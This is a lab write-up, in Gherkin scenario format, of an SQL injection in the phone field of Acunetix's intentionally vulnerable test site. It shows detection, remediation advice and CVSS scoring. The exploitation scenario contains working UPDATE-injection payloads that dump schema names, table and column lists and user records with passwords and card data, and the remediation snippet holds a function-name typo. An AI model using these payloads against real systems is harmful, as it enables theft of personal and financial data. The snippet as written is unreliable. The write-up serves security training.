## Version 1.4.1
## language: en

Feature:
  TOE:
   Acuart
  Location:
   http://testphp.vulnweb.com - Phone (field)
  CWE:
   CWE-0089: Improper Neutralization of Special Elements used in an SQL Command
  Rule:
   REQ.173 Discard unsafe inputs
  Goal:
   Detect and exploit vuln Insecure SQL query input
  Recommendation:
   Use parameterized queries with known tools

  Background:
    Hacker's software:
     | <Software name> | <Version>     |
     | Kali Linux      | 2020.3        |
     | Firefox         | 68.10.0esr    |
     | SSH             | OpenSSH_8.3p1 |
  TOE information:
    Given I am accessing the site http://testphp.vulnweb.com
    And Entered a PHP site which uses SQL requests

  Scenario: Normal use case
    Given I access to http://testphp.vulnweb.com/
    When I click on "signup"
    Then I access to http://testphp.vulnweb.com/login.php/
    And I can see a login form
    When I log in with "test" as username and password
    Then I access to http://testphp.vulnweb.com/userinfo.php/
    And this it can be seen in [evidence](img1.png) and [evidence](img1.png)

  Scenario: Static detection
    Given I access to http://testphp.vulnweb.com/userinfo.php/
    When I open the source code of the page from the browser inspector
    Then I can see that form tag uses the POST with the action attribute empty
    And I conclude that form tag has the action in the same file "userInfo.php"
    And it is not possible to access to the source code PHP of this file
    Then I can't find possible vulnerabilities in that file

 Scenario: Dynamic detection
    Given I access to http://testphp.vulnweb.com/userinfo.php/
    When I update "Address" with a "'" as can see in [evidence](img2.png)
    Then I get SQL syntax error, it also showing me the site database (MySQL)
    And I can also see that the last data that is updated is "phone"
    Then I conclude that the fields for update have SQLi vulnerability
    And this it can be seen in [evidence](img3.png)

  Scenario: Exploitation
    Given I access to http://testphp.vulnweb.com/userinfo.php/
    When I write the following SQL syntax in "Phone Number" field and I update
    """
    ', name = (select schema_name from (select *
       from information_schema.schemata) as t limit 1 offset 1), phone = '3
    """
    Then I can see the database name as can see in [evidence](img4.png)
    When I write the following SQL syntax in "Phone Number" field and I update
    """
    ', name = (select schema_name from (select *
       from information_schema.schemata) as t limit 1 offset 1),
       cc = (select GROUP_CONCAT(table_name) from (select *
       from information_schema.tables WHERE table_schema='acuart') as t),
       phone = '3
    """
    Then I can see the tables from acuart in "Credit Card Number" field
    And this it can be seen in [evidence](img5.png)
    When I write the following SQL syntax in "Phone Number" field and I update
    """
    ', name = (select schema_name from (select *
       from information_schema.schemata) as t limit 1 offset 1),
       cc = (select GROUP_CONCAT(table_name) from (select *
       from information_schema.tables WHERE table_schema='acuart') as t),
       email = (select GROUP_CONCAT(column_name) from (select *
       from information_schema.columns where table_name='users') as t),
       phone = '3
    """
    Then I can see the attributes from users table in "E-Mail" field
    And this it can be seen in [evidence](img6.png)
    When I write the following SQL syntax in "Phone Number" field and I update
    """
    ', name = (select schema_name from (select *
       from information_schema.schemata) as t limit 1 offset 1),
       cc = (select GROUP_CONCAT(table_name) from (select *
       from information_schema.tables WHERE table_schema='acuart') as t),
       email = (select GROUP_CONCAT(column_name) from (select *
       from information_schema.columns where table_name='users') as t),
       address = (select concat(address, ",", cart, ",", cc, ",", email, ",",
       name, ",", pass, ",", phone, ",", uname) from (select * from users)
       as t), phone = '3
    """
    Then I can see the data of the first record of the users table
    And I can see in "Address" field as can see in [evidence](img7.png)

  Scenario: Remediation
    When Use parameterized queries in the back
    Then the program can successfully avoid most of the known SQLi
    Given I know that the site is PHP and database is MySQL
    Then I can use MySQLi as tools of parameterized queries
    And it can be seen an example in the following line
    """
    ...
    $sql = "SELECT email FROM users WHERE username = ? AND password = ?"
    $sqlQuery = mysqli_prepare($connection, $sql);
    $result = mysqli_stmt_bind_param($sqlQuery, "ss", $userValue, $passValue);
    $result = msqli_stmt_execute($sqlQuery);

    if ($result) {
      $result = mysqli_stmt_bind_result($sqlQuery, $email);
      if(mysqli_stmt_fetch($sqlQuery)) {
        echo $email;
      }
    }
    ...
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.9/10 (Critical) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.2/10 (Critical) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    9.2/10 (Critical) - CR:H/IR:H/AR:L/MC:H/MI:H/MA:L

  Scenario: Correlations
    No correlations have been found to this date 2020-12-01
